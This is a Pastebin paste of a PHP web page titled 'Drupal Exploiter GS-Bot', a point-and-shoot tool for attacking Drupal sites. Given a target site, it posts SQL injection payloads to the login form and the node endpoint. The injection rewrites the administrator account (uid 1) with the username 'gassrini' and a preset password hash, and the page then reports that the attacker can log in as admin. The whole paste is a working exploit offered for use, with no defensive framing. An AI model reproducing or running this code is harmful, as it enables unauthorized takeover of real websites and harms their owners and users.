API tools faq
paste
RaiC0d3r

drupal gs

RaiC0d3r
Jul 21st, 2018
79
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.63 KB | None | 0 0
raw download clone embed print report diff
  1. <!Doctype HTML>
  2. <html>
  3. <head>
  4. <title>Drupal Exploiter GS-Bot |CODED FALLAGASSRINI</title>
  5. <style type="text/css">
  6. .mymargin{
  7. margin-top:100px;
  8. color:white;
  9. font-family: monospace;
  10. }
  11. body{
  12. background-color:black;
  13. }
  14. </style>
  15. </head>
  16. <body>
  17. <div class="mymargin">
  18. <center>
  19. <form method="GET" action="">
  20. Site : <input type="text" name="url" placeholder="Example: www.site.com">
  21. <input type="submit" name="submit" value="submit">
  22. </form>
  23. <br>
  24. <?php
  25. error_reporting(0);
  26. if(isset($_GET['submit'])){
  27.  
  28. $url = $_GET['url'];
  29. $post_data = "name[0;update users set name %3D 'gassrini' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status
  30. %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  31. $params = array(
  32. 'http' => array(
  33. 'method' => 'POST',
  34. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  35. 'content' => $post_data
  36. )
  37. );
  38. $ctx = stream_context_create($params);
  39. $data = file_get_contents($url . '/user/login/', null, $ctx);
  40. echo "<h3>Testing at \"/user/login/</h3>\"";
  41. if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
  42. echo "Success! Log in with username \"gassrini\" and password \"admin\" at {$url}/user/login";
  43. } else {
  44. echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
  45. }
  46. }
  47.  
  48. if(isset($_GET['submit'])){
  49.  
  50. $url = "http://".$_GET['url']."/";
  51. $post_data = "name[0;update users set name %3D 'gassrini' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status
  52. %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  53. $params = array(
  54. 'http' => array(
  55. 'method' => 'POST',
  56. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  57. 'content' => $post_data
  58. )
  59. );
  60. $ctx = stream_context_create($params);
  61. $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  62. echo "<h3>Testing at \"Index</h3>\"";
  63. if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  64. echo "Success! Log in with username \"gassrini\" and password \"admin\" at {$url}/user/login";
  65. } else {
  66. echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
  67. }
  68. }
  69.  
  70. ?>
  71. </div>
  72.  
  73. </body>
  74. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!